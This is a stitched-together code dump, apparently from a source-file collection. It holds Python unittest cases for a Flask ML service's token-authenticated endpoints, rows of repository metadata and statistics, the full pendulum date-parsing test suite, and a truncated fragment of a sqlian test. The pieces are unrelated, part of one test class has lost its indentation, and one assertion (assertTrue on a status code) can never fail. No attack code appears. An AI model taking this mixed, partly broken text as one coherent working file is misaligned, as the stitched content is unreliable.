            self.assertTrue(data['message'] == 'Token blacklisted. Please log in again.')
            self.assertEqual(response.status_code, 401)

    def test_startml_expired_token(self):
        """Test for starting ml with an expired token."""
        with self.client:
            auth_token = encode_auth_token(1)
            # wait for token to be invalidated (tokens live 5 seconds)
            time.sleep(6)
            response = self.client.post(
                '/ml/start',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Signature expired. Please log in again.')
            self.assertEqual(response.status_code, 401)

    def test_startml_no_files(self):
        """Test for starting ml with no provided files."""
        with self.client:
            auth_token = encode_auth_token(1)
            # valid auth but no request body at all
            response = self.client.post(
                '/ml/start',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'No files provided.')
            self.assertEqual(response.status_code, 400)

    def test_startml_empty_file_list(self):
        """Test for starting ml with an empty file list."""
        with self.client:
            auth_token = encode_auth_token(1)
            response = self.client.post(
                '/ml/start',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                ),
                data=json.dumps(dict(
                    files=[]
                )),
                content_type='application/json'
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'No files provided.')
            self.assertEqual(response.status_code, 400)

    def test_startml_no_status(self):
        """Test for starting ml with no status in status db."""
        with self.client:
            auth_token = encode_auth_token(1)
            # no MLStatus row exists for this user -> server starts fresh
            response = self.client.post(
                '/ml/start',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                ),
                data=json.dumps(dict(
                    files=['file_1', 'file_2']
                )),
                content_type='application/json'
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'success')
            self.assertTrue(data['message'] == 'Successfully started ML on 2 files.')
            self.assertEqual(response.status_code, 200)

    def test_startml_bad_status(self):
        """Test for starting ml with status that isn't 'Waiting for files.'"""
        with self.client:
            auth_token = encode_auth_token(1)
            # set user status in db
            status = MLStatus(1, "Processing.")
            db.session.add(status)
            db.session.commit()
            # request
            response = self.client.post(
                '/ml/start',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                ),
                data=json.dumps(dict(
                    files=['file_1', 'file_2']
                )),
                content_type='application/json'
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Already processing files for this user.')
            self.assertEqual(response.status_code, 401)

    def test_startml(self):
        """Test for starting ml with correct status."""
        with self.client:
            auth_token = encode_auth_token(1)
            # set user status in db
            status = MLStatus(1, "Waiting for files.")
            db.session.add(status)
            db.session.commit()
            # request
            response = self.client.post(
                '/ml/start',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                ),
                data=json.dumps(dict(
                    files=['file_1', 'file_2']
                )),
                content_type='application/json'
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'success')
            self.assertTrue(data['message'] == 'Successfully started ML on 2 files.')
            self.assertEqual(response.status_code, 200)
class TestStatusML(BaseTestCase):
    """Tests to ensure ML Status works.

    Each case GETs /ml/status with a different auth defect or database
    state and checks the JSON envelope and HTTP status code.
    """

    def test_statustml_no_auth(self):
        """Test for ml status with no provided token"""
        with self.client:
            response = self.client.get(
                '/ml/status'
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Provide a valid auth token.')
            self.assertEqual(response.status_code, 401)

    def test_statusml_malformed_bearer(self):
        """Test for ml status with malformed bearer token."""
        with self.client:
            auth_token = encode_auth_token(1)
            response = self.client.get(
                '/ml/status',
                headers=dict(
                    # deliberately no space after 'Bearer' -> malformed header
                    Authorization='Bearer' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Bearer token malformed.')
            self.assertEqual(response.status_code, 401)

    def test_statusml_blacklisted_token(self):
        """Test for ml status with a blacklisted token."""
        with self.client:
            auth_token = encode_auth_token(1)
            # Blacklist a valid token
            blacklist_token = BlacklistToken(auth_token.decode())
            db.session.add(blacklist_token)
            db.session.commit()
            # blacklisted token request
            response = self.client.get(
                '/ml/status',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Token blacklisted. Please log in again.')
            self.assertEqual(response.status_code, 401)

    def test_statusml_expired_token(self):
        """Test for ml status with an expired token."""
        with self.client:
            auth_token = encode_auth_token(1)
            # wait for token to be invalidated (tokens live 5 seconds)
            time.sleep(6)
            response = self.client.get(
                '/ml/status',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Signature expired. Please log in again.')
            self.assertEqual(response.status_code, 401)

    def test_statusml_no_status(self):
        """Test for ml status with no previous status."""
        with self.client:
            auth_token = encode_auth_token(1)
            # no MLStatus row -> server reports the default state
            response = self.client.get(
                '/ml/status',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'success')
            self.assertTrue(data['message'] == 'Waiting for files.')
            self.assertEqual(response.status_code, 200)

    def test_statusml(self):
        """Test for ml status."""
        with self.client:
            auth_token = encode_auth_token(1)
            # insert ml status
            status = MLStatus(1, "Processing.")
            db.session.add(status)
            db.session.commit()
            # request
            response = self.client.get(
                '/ml/status',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'success')
            self.assertTrue(data['message'] == 'Processing.')
            self.assertEqual(response.status_code, 200)
class TestGetClassified(BaseTestCase):
    """Tests to ensure getting classified JSON works.

    Each case GETs /ml/classified with a different auth defect or
    database state and checks the JSON envelope and HTTP status code.
    """

    def test_getclassified_no_auth(self):
        """Test for getting classified json with no provided token"""
        with self.client:
            response = self.client.get(
                '/ml/classified'
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Provide a valid auth token.')
            self.assertEqual(response.status_code, 401)

    def test_getclassified_malformed_bearer(self):
        """Test for getting classified json with malformed bearer token."""
        with self.client:
            auth_token = encode_auth_token(1)
            response = self.client.get(
                '/ml/classified',
                headers=dict(
                    # deliberately no space after 'Bearer' -> malformed header
                    Authorization='Bearer' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Bearer token malformed.')
            self.assertEqual(response.status_code, 401)

    def test_getclassified_blacklisted_token(self):
        """Test for getting classified json with blacklisted token."""
        with self.client:
            auth_token = encode_auth_token(1)
            # Blacklist a valid token
            blacklist_token = BlacklistToken(auth_token.decode())
            db.session.add(blacklist_token)
            db.session.commit()
            # blacklisted token request
            response = self.client.get(
                '/ml/classified',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Token blacklisted. Please log in again.')
            self.assertEqual(response.status_code, 401)

    def test_getclassified_expired_token(self):
        """Test for getting classified json with expired token."""
        with self.client:
            auth_token = encode_auth_token(1)
            # wait for token to be invalidated (tokens live 5 seconds)
            time.sleep(6)
            # FIX: added the leading slash for consistency with the
            # other requests (werkzeug accepts both forms).
            response = self.client.get(
                '/ml/classified',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Signature expired. Please log in again.')
            self.assertEqual(response.status_code, 401)

    def test_getclassified_no_status(self):
        """Test for getting classified json with no previous status."""
        with self.client:
            auth_token = encode_auth_token(1)
            response = self.client.get(
                '/ml/classified',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'User has not classified any data.')
            # FIX: was assertTrue(response.status_code, 404), which always
            # passes (the 404 was treated as the assertion message).
            self.assertEqual(response.status_code, 404)

    def test_getclassified_wrong_status(self):
        """Test for getting classified json with status other than 'Completed.'"""
        with self.client:
            auth_token = encode_auth_token(1)
            # insert ml status
            status = MLStatus(1, "Processing.")
            db.session.add(status)
            db.session.commit()
            # request
            response = self.client.get(
                '/ml/classified',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'Classification not yet completed for given user. Current status: Processing.')
            self.assertEqual(response.status_code, 401)

    def test_getclassified_no_json(self):
        """Test for getting classified json with no json in db."""
        with self.client:
            auth_token = encode_auth_token(1)
            # insert ml status
            status = MLStatus(1, "Completed.")
            db.session.add(status)
            db.session.commit()
            # request
            response = self.client.get(
                '/ml/classified',
                headers=dict(
                    # NOTE(review): lowercase 'bearer ' kept from the original —
                    # presumably the API matches the scheme case-insensitively;
                    # confirm against the auth middleware.
                    Authorization='bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            self.assertTrue(data['status'] == 'fail')
            self.assertTrue(data['message'] == 'No classified data found for given user.')
            self.assertEqual(response.status_code, 404)

    def test_getclassified(self):
        """Test for getting classified json."""
        with self.client:
            auth_token = encode_auth_token(1)
            # insert ml status with an attached classification result
            status = MLStatus(1, "Completed.")
            status.classified_json = {
                'omg': '123'
            }
            db.session.add(status)
            db.session.commit()
            # request
            response = self.client.get(
                '/ml/classified',
                headers=dict(
                    Authorization='Bearer ' + auth_token.decode()
                )
            )
            data = json.loads(response.data.decode())
            json_data = data['data']
            self.assertTrue(data['status'] == 'success')
            self.assertTrue(data['message'] == 'Returning classified information.')
            self.assertTrue(json_data['omg'] == '123')
            self.assertEqual(response.status_code, 200)
class TestGetPastClassifiedAsJson(BaseTestCase):
"""Tests to ensure getting past classifications as json works."""
def test_getpastclassifiedasjson_no_auth(self):
"""Test for getting past classified json with no provided token"""
with self.client:
response = self.client.post(
'/ml/past_classified_json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Provide a valid auth token.')
self.assertEqual(response.status_code, 401)
def test_getpastclassifiedasjson_malformed_bearer(self):
"""Test for getting past classified json with malformed bearer token."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Bearer token malformed.')
self.assertEqual(response.status_code, 401)
def test_getpastclassifiedasjson_blacklisted_token(self):
"""Test for getting past classified json with blacklisted token."""
with self.client:
auth_token = encode_auth_token(1)
# Blacklist a valid token
blacklist_token = BlacklistToken(auth_token.decode())
db.session.add(blacklist_token)
db.session.commit()
# blacklisted token request
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Token blacklisted. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_getpastclassifiedasjson_expired_token(self):
"""Test for getting past classified json with expired token."""
with self.client:
auth_token = encode_auth_token(1)
# wait for token to be invalidated
time.sleep(6)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Signature expired. Please log in again.')
self.assertEqual(response.status_code, 401)
def test_getpastclassifiedasjson_no_files(self):
"""Test for getting past classified json with no json data provided."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
)
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'File name not provided.')
self.assertTrue(response.status_code, 400)
def test_getpastclassifiedasjson_bad_filename(self):
"""Test for getting past classified json with no 'file_name' key provided."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
test='bad'
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'File name not provided.')
self.assertEqual(response.status_code, 400)
def test_getpastclassifiedasjson_bad_download_url(self):
"""Test for getting past classified json with bad generated url."""
with self.client:
auth_token = encode_auth_token(1)
response = self.client.post(
'/ml/past_classified_json',
headers=dict(
Authorization='Bearer ' + auth_token.decode()
),
data=json.dumps(dict(
file_name='bad_download_code'
)),
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['status'] == 'fail')
self.assertTrue(data['message'] == 'Bad response from download url. Please try downloading again, or classify your csv again.')
self.assertEqual(response.status_code, 404)
def test_getpastclassifiedasjson(self):
    """Happy path: a known file name returns the classified data payload."""
    with self.client:
        token = encode_auth_token(1)
        payload = json.dumps({'file_name': 'test'})
        response = self.client.post(
            '/ml/past_classified_json',
            headers={'Authorization': 'Bearer ' + token.decode()},
            data=payload,
            content_type='application/json'
        )
        body = json.loads(response.data.decode())
        classified = body['data']
        self.assertTrue(body['status'] == 'success')
        self.assertTrue(body['message'] == 'Returning classified information.')
        self.assertTrue(classified['test_data'] == 123)
        self.assertEqual(response.status_code, 200)
| 40.362013
| 139
| 0.557214
| 2,525
| 24,863
| 5.365149
| 0.093861
| 0.067764
| 0.08238
| 0.048055
| 0.861519
| 0.846903
| 0.831402
| 0.793607
| 0.756551
| 0.726582
| 0
| 0.009908
| 0.334232
| 24,863
| 616
| 140
| 40.362013
| 0.808494
| 0.123919
| 0
| 0.720978
| 0
| 0
| 0.116517
| 0.008913
| 0
| 0
| 0
| 0
| 0.199593
| 1
| 0.069246
| false
| 0
| 0.01833
| 0
| 0.101833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcd7a53edb9f53dac895c3bd2a3fd5107b408282
| 15,535
|
py
|
Python
|
tests/parsing/test_parsing.py
|
seandstewart/pendulum
|
daa4b936daf3f4dfa7d211aa0ac1e9d82d5401d4
|
[
"MIT"
] | 5,049
|
2016-07-04T07:16:34.000Z
|
2022-03-31T07:41:48.000Z
|
tests/parsing/test_parsing.py
|
seandstewart/pendulum
|
daa4b936daf3f4dfa7d211aa0ac1e9d82d5401d4
|
[
"MIT"
] | 536
|
2016-07-05T22:46:29.000Z
|
2022-03-22T12:41:54.000Z
|
tests/parsing/test_parsing.py
|
seandstewart/pendulum
|
daa4b936daf3f4dfa7d211aa0ac1e9d82d5401d4
|
[
"MIT"
] | 373
|
2016-07-05T19:51:51.000Z
|
2022-03-23T16:57:46.000Z
|
import datetime
import pendulum
import pytest
from pendulum.parsing import ParserError
from pendulum.parsing import parse
def test_y():
    """A bare year parses to January 1st of that year at midnight, naive."""
    parsed = parse("2016")
    assert (parsed.year, parsed.month, parsed.day) == (2016, 1, 1)
    assert (parsed.hour, parsed.minute, parsed.second, parsed.microsecond) == (0, 0, 0, 0)
    assert parsed.tzinfo is None
def test_ym():
text = "2016-10"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_ymd():
    """A full ISO date parses with a midnight time component, naive."""
    parsed = parse("2016-10-06")
    assert (parsed.year, parsed.month, parsed.day) == (2016, 10, 6)
    assert (parsed.hour, parsed.minute, parsed.second, parsed.microsecond) == (0, 0, 0, 0)
    assert parsed.tzinfo is None
def test_ymd_one_character():
text = "2016-2-6"
parsed = parse(text, strict=False)
assert 2016 == parsed.year
assert 2 == parsed.month
assert 6 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_ymd_hms():
    """Date plus time parses, with and without fractional seconds."""
    parsed = parse("2016-10-06 12:34:56")
    assert (parsed.year, parsed.month, parsed.day) == (2016, 10, 6)
    assert (parsed.hour, parsed.minute, parsed.second, parsed.microsecond) == (12, 34, 56, 0)
    assert parsed.tzinfo is None

    # Same instant with explicit microseconds.
    parsed = parse("2016-10-06 12:34:56.123456")
    assert (parsed.year, parsed.month, parsed.day) == (2016, 10, 6)
    assert (parsed.hour, parsed.minute, parsed.second, parsed.microsecond) == (12, 34, 56, 123456)
    assert parsed.tzinfo is None
def test_rfc_3339():
    """An RFC 3339 timestamp keeps its +05:30 offset (19800 seconds)."""
    parsed = parse("2016-10-06T12:34:56+05:30")
    assert (parsed.year, parsed.month, parsed.day) == (2016, 10, 6)
    assert (parsed.hour, parsed.minute, parsed.second, parsed.microsecond) == (12, 34, 56, 0)
    assert parsed.utcoffset().total_seconds() == 19800
def test_rfc_3339_extended():
text = "2016-10-06T12:34:56.123456+05:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 123456 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
text = "2016-10-06T12:34:56.000123+05:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 123 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
def test_rfc_3339_extended_nanoseconds():
text = "2016-10-06T12:34:56.123456789+05:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 6 == parsed.day
assert 12 == parsed.hour
assert 34 == parsed.minute
assert 56 == parsed.second
assert 123456 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
def test_iso_8601_date():
text = "2012"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012-05-03"
parsed = parse(text)
assert 2012 == parsed.year
assert 5 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20120503"
parsed = parse(text)
assert 2012 == parsed.year
assert 5 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012-05"
parsed = parse(text)
assert 2012 == parsed.year
assert 5 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_datetime():
text = "2016-10-01T14"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2016-10-01T14:30"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 30 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20161001T14"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20161001T1430"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 30 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20161001T1430+0530"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 30 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
text = "20161001T1430,4+0530"
parsed = parse(text)
assert 2016 == parsed.year
assert 10 == parsed.month
assert 1 == parsed.day
assert 14 == parsed.hour
assert 30 == parsed.minute
assert 0 == parsed.second
assert 400000 == parsed.microsecond
assert 19800 == parsed.utcoffset().total_seconds()
text = "2008-09-03T20:56:35.450686+01"
parsed = parse(text)
assert 2008 == parsed.year
assert 9 == parsed.month
assert 3 == parsed.day
assert 20 == parsed.hour
assert 56 == parsed.minute
assert 35 == parsed.second
assert 450686 == parsed.microsecond
assert 3600 == parsed.utcoffset().total_seconds()
def test_iso8601_week_number():
text = "2012-W05"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 30 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012W05"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 30 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
# Long Year
text = "2015W53"
parsed = parse(text)
assert 2015 == parsed.year
assert 12 == parsed.month
assert 28 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012-W05-5"
parsed = parse(text)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012W055"
parsed = parse(text)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2009-W53-7"
parsed = parse(text)
assert 2010 == parsed.year
assert 1 == parsed.month
assert 3 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2009-W01-1"
parsed = parse(text)
assert 2008 == parsed.year
assert 12 == parsed.month
assert 29 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_week_number_with_time():
text = "2012-W05T09"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 30 == parsed.day
assert 9 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012W05T09"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 30 == parsed.day
assert 9 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012-W05-5T09"
parsed = parse(text)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
assert 9 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012W055T09"
parsed = parse(text)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
assert 9 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_ordinal():
text = "2012-007"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 7 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "2012007"
parsed = parse(text)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 7 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_time():
now = pendulum.datetime(2015, 11, 12)
text = "201205"
parsed = parse(text, now=now)
assert 2015 == parsed.year
assert 11 == parsed.month
assert 12 == parsed.day
assert 20 == parsed.hour
assert 12 == parsed.minute
assert 5 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20:12:05"
parsed = parse(text, now=now)
assert 2015 == parsed.year
assert 11 == parsed.month
assert 12 == parsed.day
assert 20 == parsed.hour
assert 12 == parsed.minute
assert 5 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "20:12:05.123456"
parsed = parse(text, now=now)
assert 2015 == parsed.year
assert 11 == parsed.month
assert 12 == parsed.day
assert 20 == parsed.hour
assert 12 == parsed.minute
assert 5 == parsed.second
assert 123456 == parsed.microsecond
assert parsed.tzinfo is None
def test_iso8601_ordinal_invalid():
    """An ordinal date cannot carry a trailing day component."""
    with pytest.raises(ParserError):
        parse("2012-007-05")
def test_exact():
    """exact=True returns plain date/time objects rather than datetimes."""
    date_cases = [
        ("2012", (2012, 1, 1)),
        ("2012-03", (2012, 3, 1)),
        ("2012-03-13", (2012, 3, 13)),
        ("2012W055", (2012, 2, 3)),   # ISO week date
        ("2012007", (2012, 1, 7)),    # ISO ordinal date
    ]
    for text, (year, month, day) in date_cases:
        parsed = parse(text, exact=True)
        assert isinstance(parsed, datetime.date)
        assert (parsed.year, parsed.month, parsed.day) == (year, month, day)

    # A bare time yields a datetime.time instance.
    parsed = parse("20:12:05", exact=True)
    assert isinstance(parsed, datetime.time)
    assert (parsed.hour, parsed.minute, parsed.second, parsed.microsecond) == (20, 12, 5, 0)
def test_edge_cases():
text = "2013-11-1"
parsed = parse(text, strict=False)
assert 2013 == parsed.year
assert 11 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "10-01-01"
parsed = parse(text, strict=False)
assert 2010 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "31-01-01"
parsed = parse(text, strict=False)
assert 2031 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "32-01-01"
parsed = parse(text, strict=False)
assert 2032 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_strict():
text = "4 Aug 2015 - 11:20 PM"
with pytest.raises(ParserError):
parse(text)
parsed = parse(text, strict=False)
assert 2015 == parsed.year
assert 8 == parsed.month
assert 4 == parsed.day
assert 23 == parsed.hour
assert 20 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_invalid():
    """Malformed inputs raise ParserError in strict mode."""
    invalid_inputs = [
        "201610T",     # time designator with nothing after it
        "2012-W54",    # week number out of range
        "2012-W13-8",  # weekday out of range
        "2017W53",     # W53 in normal year (not long)
    ]
    for text in invalid_inputs:
        with pytest.raises(ParserError):
            parse(text)
def test_exif_edge_case():
    """EXIF-style timestamps use ':' as the date separator as well."""
    parsed = parse("2016:12:26 15:45:28")
    assert (parsed.year, parsed.month, parsed.day) == (2016, 12, 26)
    assert (parsed.hour, parsed.minute, parsed.second) == (15, 45, 28)
| 22.678832
| 54
| 0.637206
| 2,063
| 15,535
| 4.773146
| 0.066408
| 0.082462
| 0.153143
| 0.069463
| 0.908297
| 0.896618
| 0.868793
| 0.84899
| 0.805931
| 0.786839
| 0
| 0.101511
| 0.258706
| 15,535
| 684
| 55
| 22.711988
| 0.75356
| 0.00251
| 0
| 0.814961
| 0
| 0
| 0.042342
| 0.009875
| 0
| 0
| 0
| 0
| 0.722441
| 1
| 0.03937
| false
| 0
| 0.009843
| 0
| 0.049213
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bce055ca1ad9cfcef9b6f48034c84525245dfb4b
| 2,042
|
py
|
Python
|
tests/standard/test_standard_insert.py
|
uranusjr/sqlian
|
8f029e91af032e23ebb95cb599aa7267ebe75e05
|
[
"0BSD"
] | null | null | null |
tests/standard/test_standard_insert.py
|
uranusjr/sqlian
|
8f029e91af032e23ebb95cb599aa7267ebe75e05
|
[
"0BSD"
] | null | null | null |
tests/standard/test_standard_insert.py
|
uranusjr/sqlian
|
8f029e91af032e23ebb95cb599aa7267ebe75e05
|
[
"0BSD"
] | null | null | null |
from sqlian import Sql
def test_insert(engine):
